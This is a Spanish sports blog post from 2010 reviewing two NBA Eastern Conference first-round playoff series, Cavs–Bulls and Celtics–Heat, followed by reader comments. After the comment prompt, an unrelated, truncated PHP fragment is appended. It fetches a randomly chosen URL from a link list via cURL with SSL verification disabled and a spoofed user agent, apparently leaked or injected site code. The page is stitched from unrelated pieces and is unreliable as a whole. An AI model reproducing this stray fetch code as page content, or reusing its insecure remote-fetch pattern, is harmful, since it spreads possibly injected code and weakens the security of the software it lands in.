Playoffs 2009-2010: Primera Ronda del Este (I)

28 de April de 2010 por txusma

Cavs 4 – 1 Bulls (Txusma)

Ya comentamos en su momento que nadie le daba a los Bulls más de 5 partidos de liga pero hay que reconocerle al equipo de Del Negro la capacidad de ganar un partido y pelear hasta el final 2 más. Tras el espectáculo que nos ofrecieron el año pasado frente los Celtics era lo mínimo que podíamos esperar de ellos.

De todas maneras los Cavs no han sudado en demasía conscientes de que apretando un pelín más el acelerador podían llevarse sin problemas los partidos. Lebron James ha estado a un nivel estratosférico toda la serie y Antawn Jamison y Mo Williams han sido las otras dos fuentes de anotación regular. Shaquille también ha estado a buen nivel en el tiempo que ha jugado demostrando que puede ser factor diferencial en batallas más arduas. Además el banquillo ha respondido en momentos concretos en los que ha sido requerido. Moon, West, Hickson y Varejao se han ido turnando para aportar profundidad al juego de los Cavs.

En los Bulls, Derrick Rose demuestra una vez más que no se amilana ante los retos y ha liderado a su equipo en todos y cada uno de los partidos. Con Noah y Deng como escuderos ha puesto en aprietos a los todopoderosos Cavs. Se puede ir a casa con la cabeza bien alta. Veremos el año que viene si Del Negro continúa en el equipo y si hay algún fichaje de relumbrón (¿Chris Bosh?).

MVP: Lebron James, sin duda. Un triple doble y cerquita en otros dos partidos. Ha demostrado que puede ser una tontería pensar como pararlo y que los rivales deberían centrarse en desactivar los otros activos de Clevelad.

Rookie: Taj Gibson ha mantenido el nivel que lleva mostrando desde que se hizo con un puesto de titular. 8 puntos y 7 rebotes de trabajo incansable.

Sorpresa: Llegaron los Playoffs y con ellos el momento de Antawn Jamison. Evidentemente su actuación no es una sorpresa en sí misma, pero se confirma que su fichaje puede dar un anillo.

Decepción: Dejaremos desierto el premio ya que todos los jugadores han dado lo mejor que tenían. En todo caso para mí sería una decepción que los Bulls despidiesen a Del Negro después de lo que ha hecho estas 2 últimas temporadas con plantillas que tampoco podían aspirar a mucho más.

Esfuerzo en vano: En general todos los Bulls se merecen el título pero Derrick Rose más que ninguno. 26,8 puntos y 7.2 rebotes se ha marcado un jugador que no parece de segundo año.

Celtics 4 – 1 Heat (TheDeerHunter)

No anduvimos demasiado finos con nuestras previsiones. La apuesta era audaz, no se puede negar, todo lo audaz que resulta ignorar aquella ley de que “no se debe subestimar el corazón de un equipo campeón”. Los Heat son una banda. Un gran solista no convierte una banda en una filarmónica. Wade se ha salido, sí… pero los Beasley, O’Neal, Haslem o Richardson han mostrado una incompetencia casi absoluta frente a unos Celtics que tampoco han deslumbrado. Al final la serie ni siquiera ha servido para disipar dudas sobre el estado de forma de Garnett ni su calificación de “clave” para el resultado de la eliminatoria. El equipo prácticamente llegó a jugar mejor sin él que con él. Ahora sí les llega una buena piedra de toque para comprobarlo.

MVP: Podría haber empate técnico entre Ray Allen y Paul Pierce. El buzzer que metió Pierce en el tercero inclinan la balanza. 19.6 puntos, 5.6 rebotes y 3.2 asistencias también tienen la culpa.

Rookie: ninguno gasta de eso.

Sorpresa: A estas alturas muchas no hay, pero la actuación de “Big Baby” Davis en la sanción a Garnett podría ser considerada como tal y nos recordó muy buenos momentos del año pasado.

Decepción: Algunos estamos empezando a perder lo poco que nos quedaba de fe en Michael Beasley. Lo de Jermaine y su “sueldaco” también se ha comentado mucho. Dos muy buenas razones para mudarse a cualquier franquicia que no esté en Miami.

Esfuerzo en vano: Dwyane Wade. No hace falta decir mucho más. Lo único, que molaba mucho la camiseta de Wade con Miami pero mucho me temo que el año que viene cambiará de color.

Comenta

5 comentarios a esta entrada

  1. Mariano dice:
    #1

    Woooow, que partido me acabo de ver.. dios!

    Ganaron los Bucks para sorpresa de todo el mundo.. y para alegria mia por suerte..

    Pensar que estaban 9 pts por debajo faltando muy poco tiempo, pero en una rafaga dieron vuelta las cosas, con Ilyasova salvando dos pelotas claves que se iban.. y Delfino metiendo semejante triple para darles la ventaja de 4 que liquidó todo..

    Ahora a hinchar por los Nuggets en el partido que está empezando..

    Adios..

      Citar

  2. LEmontus dice:
    #2

    FEAR THE DEAR…. wajajajaj increible que malos son…. con un par de huevos y calidad se puede llegar lejos. Ahora vien Deron

      Citar

  3. sergio dice:
    #3

    no… si al final LEmontus es un visionario

      Citar

  4. Txusma dice:
    #4

    Se confirma el despido de Del Negro. La verdad es que no considero q lo haya tan mal como parecen querer vender dsd la franquicia. Tampoco es que haya tenido una gran plantilla y suerte que Rose no es que haya salido bueno, es que ha salido buenísimo.

      Citar

  5. TheDeerHunter dice:
    #5

    Es la crónica de una muerte anunciada.
    Se la tenían jurada desde hace tiempo… y no parece que lo decisivo haya sido el rendimiento deportivo.

    Opino que sería una buena opción para otros equipos que buscan técnico

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>